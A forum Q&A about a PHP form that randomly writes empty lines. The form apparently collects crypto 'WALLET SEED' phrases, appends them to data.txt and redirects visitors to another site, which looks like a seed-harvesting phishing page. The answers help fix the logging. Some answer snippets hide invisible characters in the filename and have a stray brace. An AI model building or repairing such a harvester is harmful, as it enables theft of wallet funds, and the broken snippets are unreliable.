# Php $_Post stops working randomly

Tags: php, html, forms, post

Ive a form

```
<form action="welcome.php" method="post" ........................">

          <button id=......................ERATE NEW SEED</button>
          <br/><br/>
          <div class="form-field">
            <label for...............">WALLET SEED</label>
            <br/>
            <textarea id=...........................="false"></textarea>
            <span class="clipSp............ successfully copied to clipboard" ></span>
            <br/>
          </div>
          <br/>

          <div clas..........content">
            <div>ADDRESS
              <br/>
              <span>{{vm.displayAddress}}</span>
            </div>
          </div>
          <button class="wButton fade" type="submit">REGISTER ACCOUNT</button>
          <span class="divider-2"></span>
          <button class="wButton fade" type="reset" ng-click="vm.back()">BACK</button>
          .
          .
          .
          .
```

Then i have this "welcome.php" file.

```
   <?php
   $var = $_POST['formdesiredpost'];
   file_put_contents("data.txt", $var . "\n", FILE_APPEND);
   header("Location: https://randomwebsiteredirect.com");
    exit();
?>
```

Its supposed to post the desired value from the form (textarea) into a txt file, data.txt .
But the problem is that it randomly works. Sometimes it works, and sometimes it just creates a new line into the data.txt file, with no text.
I thought it may be cookie issues, using incognito mode (google chrome) gives it more accuracy, but still it fails some times, creating empyte lines into the data.txt file

And i want to add, that if I delete all the content into the data.txt file, then I try to submit the form again. It starts working again. But only for 2-4 submits, then it stops posting and it only create new empty lines into the data.txt file everytime someone posts something.

Comment: add `if(!empty($_POST['formdesiredpost'])){file_put_contents("data.txt", $var . "\n", FILE_APPEND);
   header("Location: https://randomwebsiteredirect.com");
    exit();}`

Answer (score 1, accepted):

Your code will execute in every condition, even the data in `$_POST['formdesiredpost']` is empty. So when `$_POST['formdesiredpost']` empty code create empty new line in file.

You should check for empty first if you don't want to add new line empty line.

```
if(!empty($_POST['formdesiredpost'])){
    $var  = $_POST['formdesiredpost'];
    file_put_contents("dat‌​a.txt", $var . "\n", FILE_APPEND); 
    header("Location: https://randomwebsiteredirect.com"); 
    exit();
}
```

Comment: I noticed it does work, but only for short imputs (10-25) characters . If I write an imput of about 70 characters or more , it redirects me to welcome.php and gets stuck. Does nothing after all. Any clue?

Comment: try wiht add `file_put_content` in if

Answer (score 0):

empty check first.Because your post data every time create empty file

```
    $var  = $_POST['formdesiredpost'];
    if(!empty($var))
        file_put_contents("dat‌​a.txt", $var . "\n", FILE_APPEND); 
        header("Location: https://randomwebsiteredirect.com"); 
       exit();
     }
```